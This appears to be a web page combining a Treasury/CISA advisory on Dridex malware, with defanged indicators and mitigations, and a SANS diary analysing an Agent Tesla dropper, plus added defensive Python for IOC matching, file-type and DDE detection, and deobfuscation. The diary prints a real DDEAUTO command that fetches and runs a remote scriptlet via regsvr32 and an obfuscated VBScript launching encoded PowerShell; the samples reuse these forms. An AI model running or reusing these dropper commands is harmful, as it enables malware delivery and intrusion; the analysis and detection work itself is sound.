Attachments or eventual downloads can take a variety of formats. In some instances, malware downloaders are concealed in compressed files using the ZIP or RAR file formats. Occasionally compressed files within compressed files (double zipped) are used. The compressed files can include extensible markup language (.xml), Microsoft Office (.doc, .xls), Visual Basic (.vbs), JavaScript (.jar), or portable document format (.pdf) files. Many of the files, rather than containing the actual malware, contain hidden or obfuscated macros. Upon activation, the macros reach to a command and control server, FTP server, or cloud storage site to download the actual Dridex malware. In other cases, macros launch scripts that extract executables embedded in the document as opposed to downloading the payload.

By default, software generally prevents execution of macros without user permission. Attached files, particularly .doc and .xls files, contain instructions on how a user should enable content and specifically macros, effectively using social engineering to facilitate the download. Malicious files sometimes even include screenshots of the necessary actions to enable macros.

Malware Capabilities

Dridex malware operates from multiple modules that may be downloaded together or following the initial download of a “loader” module. Modules include provisions for capturing screenshots, acting as a virtual machine, or incorporating the victim machine into a botnet. Through its history and development, Dridex has used several exploits and methods for execution, including modification of directory files, using system recovery to escalate privileges, and modification of firewall rules to facilitate peer-to-peer communication for extraction of data. Recent versions of Dridex exploit vulnerability CVE-2017-0199, which allows remote execution of code. This vulnerability is specific to Microsoft Office and WordPad. Microsoft released a patch in 2017.

Once downloaded and active, Dridex has a wide range of capabilities, from downloading additional software to establishing a virtual network to deletion of files. The primary threat to financial activity is Dridex's ability to infiltrate browsers, detect access to online banking applications and websites, and inject malware or keylogging software, via API hooking, to steal customer login information. Dridex modules package, encrypt, and transmit captured information, screenshots, etc., via peer-to-peer (P2P) networks in the XML format or in binary format, as seen in newer versions. After stealing the login data, the attackers have the potential to facilitate fraudulent automated clearing house (ACH) and wire transfers, open fraudulent accounts, and potentially adapt victim accounts for other scams involving business e-mail compromise or money mule activity.

The Dridex malware has evolved through several versions since its inception, partially to adapt to updated browsers. Although the characteristics described reflect some of the most recent configurations, actors continue to identify and exploit vulnerabilities in widely used software.

Dridex Malware and Variants

While Dridex is among the most prevalent sources of infection, previous variants and similar malware continue to represent a threat. Dridex is itself an improved variant of the Cridex and Bugat Trojans that preceded it, and it shares some of their code. Although the previous variants' theft activities operate in mostly the same way, the P2P communication aspects of Dridex improve its concealment and redundancy.

Ransomware

Actors distributing Dridex likely employ ransomware with similar configurations. Code for BitPaymer, also known as Friedex, includes numerous similarities to Dridex, despite its function as ransomware rather than data extraction. The two malware families use the same mechanics for several functions, and the authors compiled the code at nearly the same time. The ransomware distributed through these malware families has targeted U.S. financial institutions and resulted in data and financial loss.

Locky ransomware operates using the same delivery method for the downloader, with similar subject lines and attachments. Attackers also use the same botnets to deliver both Dridex and Locky ransomware, sometimes simultaneously. Variants of Locky include Zepto and Osiris. Locky ransomware and its variants have a wide footprint, with varying impact depending on victim IT policies and practices and network configurations.

Dridex-related Activity

Although the highest infection rates took place in late 2015 and early 2016, concurrent with Locky ransomware distribution, Dridex continues to impact numerous countries. The Dridex hackers appear to direct the majority of attacks at English-speaking countries. Cybersecurity industry reporting attributes Dridex, BitPaymer, and Locky campaigns, as well as other massive malware spam (malspam) campaigns to actors known alternately as Evil Corp or TA505. (Note: some cybersecurity industry reporting simply refers to the actors as “Dridex” or the “Dridex hackers.”) Actors distribute the malware via massive spam campaigns, sending up to millions of messages per day, although volume of messages varies widely.

Indicators of Compromise

The following indicators are associated with the activity described in this report:

Indicator Type   Indicator Value                            Associated Activity
Email address    info[@]antonioscognamiglio[.]it            Dridex
Email address    info[@]golfprogroup[.]com                  Dridex
Email address    cariola72[@]teletu[.]it                    Dridex
Email address    faturamento[@]sudestecaminhoes[.]com.br    Dridex
Email address    info[@]melvale[.]co.uk                     Dridex
Email address    fabianurquiza[@]correo.dalvear[.]com.ar    Dridex
Email address    web1587p16[@]mail.flw-buero[.]at           Dridex
Email address    bounce[@]bestvaluestore[.]org              Dridex
Email address    farid[@]abc-telecom[.]az                   Dridex
Email address    admin[@]sevpazarlama[.]com                 Dridex
Email address    pranab[@]pdrassocs[.]com                   Dridex
Email address    tom[@]blackburnpowerltd[.]co.uk            Dridex
Email address    yportocarrero[@]elevenca[.]com             Dridex
Email address    s.palani[@]itifsl.co[.]in                  Dridex
Email address    faber[@]imaba[.]nl                         Dridex
Email address    admin[@]belpay[.]by                        Dridex
IP address       62[.]149[.]158[.]252                       Dridex
IP address       177[.]34[.]32[.]109                        Dridex
IP address       2[.]138[.]111[.]86                         Dridex
IP address       122[.]172[.]96[.]18                        Dridex
IP address       69[.]93[.]243[.]5                          Dridex
IP address       200[.]43[.]183[.]102                       Dridex
IP address       79[.]124[.]76[.]30                         Dridex
IP address       188[.]125[.]166[.]114                      Dridex
IP address       37[.]59[.]52[.]64                          Dridex
IP address       50[.]28[.]35[.]36                          Dridex
IP address       154[.]70[.]39[.]158                        Dridex
IP address       108[.]29[.]37[.]11                         Dridex
IP address       65[.]112[.]218[.]2                         Dridex


Mitigations

Treasury and CISA encourage users and organizations to:

  1. Contact law enforcement immediately to report any identified activity related to Dridex malware or its derivatives. Contact information for FBI and CISA appears at the end of this report.
  2. Incorporate the indicators of compromise identified in this report into intrusion detection systems and security alert systems to enable active blocking or reporting of suspected malicious activity. Note that the above list is not a comprehensive list of all indicators associated with this activity.
  3. Report suspicious activity, highlighting the presence of “Cyber Event Indicators.” Indicators of Compromise, such as suspicious e-mail addresses, file names, hashes, domains, and IP addresses, can be provided under Item 44 of the Suspicious Activity Report (SAR) form. FinCEN welcomes voluntary SAR filing in circumstances where reporting is not required.
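
Mitigation 2 asks for the indicators to be fed into detection and alerting systems. The table defangs them (`[.]`, `[@]`), so they must be refanged before they are usable. The following is an added example, not part of the Treasury/CISA alert: it parses a few rows copied from the table, refangs them, and checks mail-gateway log lines against the resulting sets. The Postfix-style log lines are constructed for the demonstration, and the function names are this example's own.

```python
"""Refang the defanged indicators in the table above and match them against
mail-gateway log lines. Added example (Python 3, standard library only); it is
not part of the Treasury/CISA alert. The log lines below are constructed."""
from __future__ import annotations

import re

INDICATOR_ROW = re.compile(r"^(Email address|IP address)\s+(\S+)\s+(\S+)$")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# A few rows copied from the indicator table above, still defanged.
INDICATORS_DEFANGED = """\
Email address info[@]antonioscognamiglio[.]it Dridex
Email address bounce[@]bestvaluestore[.]org Dridex
IP address 62[.]149[.]158[.]252 Dridex
IP address 177[.]34[.]32[.]109 Dridex
"""


def refang(value: str) -> str:
    """Undo the usual defanging: [.] -> ., [@] -> @, hxxp -> http. Lower-cased."""
    value = value.replace("[.]", ".").replace("(.)", ".").replace("[@]", "@")
    value = re.sub(r"^hxxp", "http", value, flags=re.I)
    return value.lower()


def load_indicators(table: str) -> dict[str, set[str]]:
    """{indicator type: {refanged values}} from 'type value activity' rows."""
    out: dict[str, set[str]] = {}
    for line in table.splitlines():
        m = INDICATOR_ROW.match(line.strip())
        if m:
            out.setdefault(m.group(1), set()).add(refang(m.group(2)))
    return out


def scan_logs(lines, indicators) -> list[tuple[int, str, str]]:
    """(1-based line number, indicator type, value) for every line touching an IOC."""
    hits: list[tuple[int, str, str]] = []
    emails = indicators.get("Email address", set())
    ips = indicators.get("IP address", set())
    for n, line in enumerate(lines, 1):
        for addr in EMAIL_RE.findall(line):
            if addr.lower() in emails:
                hits.append((n, "Email address", addr.lower()))
        for ip in IPV4_RE.findall(line):
            if ip in ips:
                hits.append((n, "IP address", ip))
    return hits


# Constructed Postfix-style log lines for the demonstration (not real traffic).
SAMPLE_LOGS = [
    "Dec  5 09:12:31 mx1 postfix/smtpd[2211]: connect from unknown[62.149.158.252]",
    "Dec  5 09:12:32 mx1 postfix/qmgr[1002]: 7F3A1: from=<info@antonioscognamiglio.it>, size=48211",
    "Dec  5 09:15:02 mx1 postfix/qmgr[1002]: 7F3A9: from=<alice@example.org>, size=1020",
    "Dec  5 09:20:44 mx1 postfix/smtpd[2211]: connect from mail.example.net[203.0.113.7]",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS, load_indicators(INDICATORS_DEFANGED)):
        print("line %d: %s %s" % hit)
```

The same refanged sets can be exported to whatever the gateway or SIEM consumes; the point of doing the refanging in code rather than by hand is that a stray `[.]` left in a blocklist silently matches nothing.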

Recommendations for All Organizations

The following mitigation recommendations respond directly to Dridex TTPs:

  • Ensure systems are configured by default to prevent execution of macros.
  • Inform and educate employees on the appearance of phishing messages, especially those the hackers have used in the past to distribute malware.
  • Update intrusion detection and prevention systems frequently to ensure the latest variants of malware and downloaders are included.
  • Conduct regular backups of data, ensuring backups are protected from potential ransomware attack.
  • Exercise employees' response to phishing messages and unauthorized intrusion.
  • If there is any doubt about message validity, call and confirm the message with the sender using a number or e-mail address already on file.

Treasury and CISA also remind users and administrators to use the following best practices to strengthen the security posture of their organization's systems:

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and require regular password changes.
  • Exercise caution when opening email attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on workstations, and configure it to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious email attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
  • Scan all software downloaded from the Internet before executing.
  • Maintain situational awareness of the latest threats.
  • Implement appropriate access control lists.
  • Exercise cybersecurity procedures and continuity of operations plans to enhance and maintain ability to respond during and following a cyber incident.

The National Institute of Standards and Technology (NIST) has published additional information on malware incident prevention and handling in its Special Publication 800-83, Guide to Malware Incident Prevention and Handling for Desktops and Laptops.

Why Best Practices Matter

The National Security Agency (NSA) recently published its Top Ten Cybersecurity Mitigation Strategies (https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf?v=1). Aligned with the NIST Cybersecurity Framework, the Strategies offer a risk-based approach to mitigating exploitation techniques used by Advanced Persistent Threat (APT) actors.

The Strategies counter a broad range of exploitation techniques used by malicious cyber actors. NSA’s mitigations set priorities for enterprise organizations to minimize mission impact. The mitigations also build upon the NIST Cybersecurity Framework functions to manage cybersecurity risk and promote a defense-in-depth security posture. The mitigation strategies are ranked by effectiveness against known APT tactics. Additional strategies and best practices will be required to mitigate the occurrence of new tactics.

  1. Update and Upgrade Software Immediately. Apply all available software updates, automate the process to the extent possible, and use an update service provided directly from the vendor. Automation is necessary because threat actors study patches and create exploits, often soon after a patch is released. These “N-day” exploits can be as damaging as a zero-day. Vendor updates must also be authentic; updates are typically signed and delivered over protected links to assure the integrity of the content. Without rapid and thorough patch application, threat actors can operate inside a defender’s patch cycle.
  2. Defend Privileges and Accounts. Assign privileges based on risk exposure and as required to maintain operations. Use a Privileged Access Management (PAM) solution to automate credential management and fine-grained access control. Another way to manage privilege is through tiered administrative access in which each higher tier provides additional access, but is limited to fewer personnel. Create procedures to securely reset credentials (e.g., passwords, tokens, tickets). Privileged accounts and services must be controlled because threat actors continue to target administrator credentials to access high-value assets, and to move laterally through the network.
  3. Enforce Signed Software Execution Policies. Use a modern operating system that enforces signed software execution policies for scripts, executables, device drivers, and system firmware. Maintain a list of trusted certificates to prevent and detect the use and injection of illegitimate executables. Execution policies, when used in conjunction with a secure boot capability, can assure system integrity. Application Whitelisting should be used with signed software execution policies to provide greater control. Allowing unsigned software enables threat actors to gain a foothold and establish persistence through embedded malicious code.
  4. Exercise a System Recovery Plan. Create, review, and exercise a system recovery plan to ensure the restoration of data as part of a comprehensive disaster recovery strategy. The plan must protect critical data, configurations, and logs to ensure continuity of operations due to unexpected events. For additional protection, backups should be encrypted, stored offsite, offline when possible, and support complete recovery and reconstitution of systems and devices. Perform periodic testing and evaluate the backup plan. Update the plan as necessary to accommodate the ever-changing network environment. A recovery plan is a necessary mitigation for natural disasters as well as malicious threats including ransomware.
  5. Actively Manage Systems and Configurations. Take inventory of network devices and software. Remove unwanted, unneeded, or unexpected hardware and software from the network. Starting from a known baseline reduces the attack surface and establishes control of the operational environment. Thereafter, actively manage devices, applications, operating systems, and security configurations. Active enterprise management ensures that systems can adapt to dynamic threat environments while scaling and streamlining administrative operations.
  6. Continuously Hunt for Network Intrusions. Take proactive steps to detect, contain, and remove any malicious presence within the network. Enterprise organizations should assume that a compromise has taken place and use dedicated teams to continuously seek out, contain, and remove threat actors within the network. Passive detection mechanisms, such as logs, Security Information and Event Management (SIEM) products, Endpoint Detection and Response (EDR) solutions, and other data analytic capabilities are invaluable tools to find malicious or anomalous behaviors. Active pursuits should also include hunt operations and penetration testing using well documented incident response procedures to address any discovered breaches in security. Establishing proactive steps will transition the organization beyond basic detection methods, enabling real-time threat detection and remediation using a continuous monitoring and mitigation strategy.
  7. Leverage Modern Hardware Security Features. Use hardware security features like Unified Extensible Firmware Interface (UEFI) Secure Boot, Trusted Platform Module (TPM), and hardware virtualization. Schedule older devices for a hardware refresh. Modern hardware features increase the integrity of the boot process, provide system attestation, and support features for high-risk application containment. Using a modern operating system on outdated hardware results in a reduced ability to protect the system, critical data, and user credentials from threat actors.
  8. Segregate Networks Using Application-Aware Defenses. Segregate critical networks and services. Deploy application-aware network defenses to block improperly formed traffic and restrict content, according to policy and legal authorizations. Traditional intrusion detection based on known-bad signatures is quickly decreasing in effectiveness due to encryption and obfuscation techniques. Threat actors hide malicious actions and remove data over common protocols, making the need for sophisticated, application-aware defensive mechanisms critical for modern network defenses.
  9. Integrate Threat Reputation Services. Leverage multi-sourced threat reputation services for files, DNS, URLs, IPs, and email addresses. Reputation services assist in the detection and prevention of malicious events and allow for rapid global responses to threats, a reduction of exposure from known threats, and provide access to a much larger threat analysis and tipping capability than an organization can provide on its own. Emerging threats, whether targeted or global campaigns, occur faster than most organizations can handle, resulting in poor coverage of new threats. Multi-source reputation and information sharing services can provide a more timely and effective security posture against dynamic threat actors.
  10. Transition to Multi-Factor Authentication. Prioritize protection for accounts with elevated privileges, remote access, and/or used on high value assets. Physical token-based authentication systems should be used to supplement knowledge-based factors such as passwords and PINs. Organizations should migrate away from single factor authentication, such as password-based systems, which are subject to poor user choices and susceptible to credential theft, forgery, and reuse across multiple systems.


Contact Information

Reporting Suspected Malicious Activity

To report an intrusion and request resources for incident response or technical assistance, contact CISA (CISAservicedesk@hq.dhs.gov or 888-282-0870), FBI through a local field office (https://www.fbi.gov/contact-us/field-offices), or FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).

Institutions should determine whether filing of a Suspicious Activity Report (“SAR”) is required under Bank Secrecy Act regulations.  In instances where filing is not required, institutions may file a SAR voluntarily to aid FinCEN and law enforcement efforts in protecting the financial sector.  Financial institutions are encouraged to provide relevant cyber-related information and indicators in their SAR reporting.  For questions regarding cyber SAR filing, please contact the FinCEN Resource Center (FRC@fincen.gov or 1-800-767-2825).

Open-Source Reporting On Dridex

The following represents an alphabetized selection of open-source reporting by U.S. government and industry sources on Dridex malware and its derivatives:


Revisions

  • December 5, 2019: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

E-mail from Agent Tesla, (Thu, Dec 5th)


Last Thursday, only a day after Brad wrote a Diary about discovering Agent Tesla sample in Any.Run[1], I found a request for analysis of a suspicious file in my inbox. The file turned out to be the first part of a multi-stage downloader for Agent Tesla and since Brad wrote about what happens after this malware arrives at the target (i.e. data exfiltration using SMTP), I thought that a closer look at what comes before the infection might nicely complete the picture of how the malware operates.

In this campaign, the first stage of the dropper was a file with a DOT extension, sent as an attachment to a phishing e-mail posing as a request for quotation. DOT files are legacy Word templates; since modern Word can still open them and they may contain macros without that being apparent from the extension, they are among the potentially useful file types for macro-based phishing attachments. And since DOT files attached to e-mail messages are nowadays seldom above-board, blocking the extension on an e-mail gateway may not be a bad idea to consider.


In this case, however, the DOT file wasn't a Word document at all, but a renamed Rich Text Format (RTF) file containing nothing but a DDE[2] call intended to download and run a WSC file, containing the second stage of the downloader, using regsvr32.

{\rtf1{\field{\*\fldinst\*\rtf dDEAUto "c:\winDoWs\SySTEM32\cmD.EXE" "/c regSvR32 -S -n /U -i:https://fajr.com/rummz.wsc SCRObj.dll"}}}


After opening the DOT file in Word, the usual DDE-related message boxes would pop up and, provided the user pressed the right buttons, the WSC file would be downloaded and executed.
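
The "true file type" check recommended in the Dridex alert earlier on this page (extension matched against the file header) would have caught this attachment: a genuine DOT file starts with the OLE compound-file signature, not with `{\rtf`. The following is an added example, not code from the diary or the alert. It maps a few well-known signatures to the container they prove, fails closed on extensions it does not know, flags OOXML packages that carry a VBA part, and pulls the command text out of any DDE/DDEAUTO field in RTF content. The sample RTF is constructed, modelled on the one above with a placeholder URL, and the function names are this example's own.

```python
"""Check that an attachment's extension matches its real (magic-byte) type,
and flag RTF content carrying a DDE/DDEAUTO field instruction. Added example
(Python 3, standard library only); not code from the diary or the alert."""
from __future__ import annotations

import io
import os
import re
import zipfile

# File signatures at offset 0 and the container they prove.
MAGIC = {
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",  # legacy .doc/.dot/.xls (Compound File)
    b"PK\x03\x04": "zip",                         # OOXML: .docx/.dotm/.docm/.xlsm ...
    b"{\\rtf": "rtf",
    b"%PDF-": "pdf",
    b"MZ": "pe",                                  # Windows executable / DLL
}

# Container each extension may legitimately have.
EXPECTED = {
    ".doc": {"ole2"}, ".dot": {"ole2"}, ".xls": {"ole2"},
    ".docx": {"zip"}, ".dotm": {"zip"}, ".docm": {"zip"}, ".xlsm": {"zip"},
    ".rtf": {"rtf"}, ".pdf": {"pdf"}, ".exe": {"pe"},
}

# Field instruction whose verb is DDE or DDEAUTO. Word treats the verb
# case-insensitively, which is why the sample above can spell it "dDEAUto".
DDE_FIELD = re.compile(rb"\\fldinst.*?\b(DDEAUTO|DDE)\b\s*([^}]*)", re.I | re.S)


def true_type(data: bytes) -> str:
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def extension_matches(filename: str, data: bytes) -> bool:
    """False on a mismatch and on extensions the table does not know (fail closed)."""
    allowed = EXPECTED.get(os.path.splitext(filename.lower())[1])
    return allowed is not None and true_type(data) in allowed


def dde_commands(data: bytes) -> list[str]:
    """Command text of every DDE/DDEAUTO field found in RTF content."""
    return [m.group(2).decode("latin-1").strip() for m in DDE_FIELD.finditer(data)]


def ooxml_has_macro(data: bytes) -> bool:
    """OOXML keeps VBA in a vbaProject.bin part; a .docx should never carry one."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            return any(n.lower().endswith("vbaproject.bin") for n in z.namelist())
    except zipfile.BadZipFile:
        return False


def analyse_attachment(filename: str, data: bytes) -> dict:
    kind = true_type(data)
    return {
        "true_type": kind,
        "extension_ok": extension_matches(filename, data),
        "dde_commands": dde_commands(data) if kind == "rtf" else [],
        "ooxml_macro": ooxml_has_macro(data) if kind == "zip" else False,
    }


# Constructed samples: an RTF DDE dropper modelled on the diary's, renamed to
# .dot (placeholder URL), and a minimal OOXML package containing a VBA part.
SAMPLE_DOT = (
    b'{\\rtf1{\\field{\\*\\fldinst\\*\\rtf dDEAUto "c:\\\\windows\\\\system32\\\\cmd.exe" '
    b'"/c regsvr32 -s -n /u -i:https://example.invalid/stage2.wsc scrobj.dll"}}}'
)


def build_sample_docm() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"\x00")
    return buf.getvalue()


if __name__ == "__main__":
    print(analyse_attachment("PO-0012_doc.dot", SAMPLE_DOT))
    print(analyse_attachment("quote.docx", build_sample_docm()))
```

Run against the constructed sample, the `.dot` is reported as `rtf`, the extension check fails, and the `dde_commands` entry shows the regsvr32 scriptlet download in the clear; the same check on the OOXML sample reports the VBA part even though the name says `.docx`.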


A WSC (Windows Script Component) file is basically just a script in an XML envelope, and although the use of this format to spread malicious code is not a new technique[3], it is not overly common either. In the Agent Tesla campaign, the WSC file contained VBScript that used PowerShell to download the Agent Tesla executable itself into the AppData folder as "gifgmimgifg.exe" and then run it.

<?xMl version = " 237654691241.7 " ?>
<scriptlet>
<registration
progid = "q"
classid = "{B28214B5-40E3-4058-856E-B187E918E0A4}" >
<script language="vBsCRIpT">
<![CDATA[
dim zvyhbmmhihovqq : DiM whkfvolnqyynrb : Set zvyhbmmhihovqq = creatEObJECT ( cHr(&h77) & ChR(&h73) & cHr(&h63) & cHR(&H52) & CHrw(&h69) & ChrW(&H70) & chRW(&H74) & CHr(&h2E) & ChR(&h73) & chRW(&h48) & chR(&H65) & Chr(&h6c) & chrw(&h6c) ) : whkfvolnqyynrb = " PoWerSHEll.exe -Ex ByPAss -NOp -W 1 -Ec IAA
...
ABlAB0g " : zvyhbmmhihovqq.run CHr ( 34 ) & zvyhbmmhihovqq.eXpANdeNVironMenTStrInGs( Chr(&H25) & Chr(&H43) & Chr(&H4F) & Chr(&H6D) & Chr(&H53) & Chr(&H70) & ChrW(&H65) & ChrW(&H63) & Chr(&H25) ) & ChR ( 34 ) & chr ( 34 ) & Chr(&H2F) & Chr(&H43) & ChrW(&H20) & whkfvolnqyynrb & chr ( 34 ) , 0 : SEt zvyhbmmhihovqq = nOTHiNG
]]>
</script>
</registration>
</scriptlet>
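
The Chr()/ChrW() concatenation in the scriptlet above is what keeps strings such as "wscript.Shell" and "%ComSpec%" out of reach of naive string matching, and the `-Ec` argument to PowerShell is base64 of UTF-16LE text. The following is an added example, not the diary's code, that undoes both: it folds every Chr()/ChrW() run back into the string it builds and decodes any `-e`/`-ec`/`-enc`/`-EncodedCommand` argument it then finds. The sample script is constructed, modelled on the one above; its PowerShell payload and URL are invented here because the diary elides the real base64 body.

```python
"""Deobfuscate the Chr()/ChrW() string building used by the WSC stage above
and decode the base64 body of the PowerShell -EncodedCommand it launches.
Added example (Python 3, standard library only); not the diary's own code."""
import base64
import re

# One Chr(...)/ChrW(...) call: decimal or &hXX argument, any casing or spacing.
_CALL = r"chrw?\s*\(\s*(?:&h[0-9a-f]+|\d+)\s*\)"
CHR_ARG = re.compile(r"chrw?\s*\(\s*(&h[0-9a-f]+|\d+)\s*\)", re.I)
# A run of such calls joined with VBScript's '&' concatenation operator.
CHR_RUN = re.compile(rf"{_CALL}(?:\s*&\s*{_CALL})*", re.I)
# PowerShell -e / -ec / -enc / -EncodedCommand followed by its base64 argument.
ENC_CMD = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def _run_to_literal(match) -> str:
    chars = []
    for arg in CHR_ARG.findall(match.group(0)):
        code = int(arg[2:], 16) if arg.lower().startswith("&h") else int(arg)
        chars.append(chr(code))
    # Readable form for the analyst; embedded quotes are shown as \" (not VBScript syntax).
    return '"' + "".join(chars).replace('"', '\\"') + '"'


def deobfuscate_chr(vbs: str) -> str:
    """Replace every Chr()/ChrW() concatenation run with the string it builds."""
    return CHR_RUN.sub(_run_to_literal, vbs)


def decode_encoded_command(b64: str) -> str:
    """PowerShell -EncodedCommand carries the script as base64 of UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")


def encode_command(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


def analyse_wsc_script(vbs: str) -> dict:
    cleaned = deobfuscate_chr(vbs)
    return {
        "vbscript": cleaned,
        "powershell": [decode_encoded_command(b) for b in ENC_CMD.findall(cleaned)],
    }


# Constructed sample modelled on the scriptlet above. The PowerShell payload and
# the URL in it are invented here, since the diary elides the real base64 body.
SAMPLE_PS = ("(New-Object Net.WebClient).DownloadFile("
             "'https://example.invalid/stage3.exe', \"$env:APPDATA\\stage3.exe\")")
SAMPLE_VBS = (
    "dim sh : dim cmd : Set sh = creatEObJECT ( cHr(&h77) & ChR(&h73) & cHr(&h63) & cHR(&H52) "
    "& CHrw(&h69) & ChrW(&H70) & chRW(&H74) & CHr(&h2E) & ChR(&h73) & chRW(&h48) & chR(&H65) "
    "& Chr(&h6c) & chrw(&h6c) ) : cmd = \" PoWerSHEll.exe -Ex ByPAss -NOp -W 1 -Ec "
    + encode_command(SAMPLE_PS)
    + " \" : sh.run CHr ( 34 ) & sh.eXpANdeNVironMenTStrInGs( Chr(&H25) & Chr(&H43) "
    "& Chr(&H4F) & Chr(&H6D) & Chr(&H53) & Chr(&H70) & ChrW(&H65) & ChrW(&H63) & Chr(&H25) ) "
    "& ChR ( 34 ) & chr ( 34 ) & Chr(&H2F) & Chr(&H43) & ChrW(&H20) & cmd & chr ( 34 ) , 0"
)

if __name__ == "__main__":
    result = analyse_wsc_script(SAMPLE_VBS)
    print(result["vbscript"])
    for ps in result["powershell"]:
        print("decoded PowerShell:", ps)
```

On the constructed sample the cleaned script reads `creatEObJECT ( "wscRipt.sHell" )` and `sh.eXpANdeNVironMenTStrInGs( "%COmSpec%" )`, which is the `cmd.exe /C powershell ...` launch that the mixed-case Chr() calls were hiding; the decoded PowerShell is then the place to look for the download URL and the drop path (AppData, in the diary's case).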


The final executable of Agent Tesla seemed quite similar to the one Brad found – at first glance, there were only two differences. The first was the use of a different e-mail account to upload stolen data. I recorded the following SMTP stream using Any.Run, as the malware didn’t try to exfiltrate any data from my local VM (probably due to some anti-sandboxing measure, although this is a conjecture on my part – the executable was heavily obfuscated and I didn’t have much time to spend on analyzing it).


The second difference was in the file the malware was disguised as. This version of Agent Tesla was made to look (icon aside) like RAMMap, a tool from the Sysinternals suite.


The following chart shows the relationships between all the files mentioned in the Diary; below it you may find all the relevant hashes.


PO-0012_doc.dot
MD5 – ba6cc1cbfa2a9ebb006ad22e0c3585ed
SHA1 – aff5bbd13558d9ada120eed34cef778319e65291

rummz.wsc
MD5 – d71439df0a524fb1c0c537d9839a8177
SHA1 – 149cbaa8110b153cc69b439b14617a6b8b87af50

gifgmimgifg.exe
MD5 – 8fef6028422a91884c5928f6568e4c80
SHA1 – ccf1e3aa6f60304c4888d2d51e56f01b96f7c842


[1] https://isc.sans.edu/forums/diary/Finding+an+Agent+Tesla+malware+sample/25554/
[2] https://en.wikipedia.org/wiki/Dynamic_Data_Exchange
[3] https://cofense.com/threat-actors-use-advanced-delivery-mechanism-distribute-trickbot-malware/

———–
Jan Kopriva
@jk0pr
Alef Nula

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.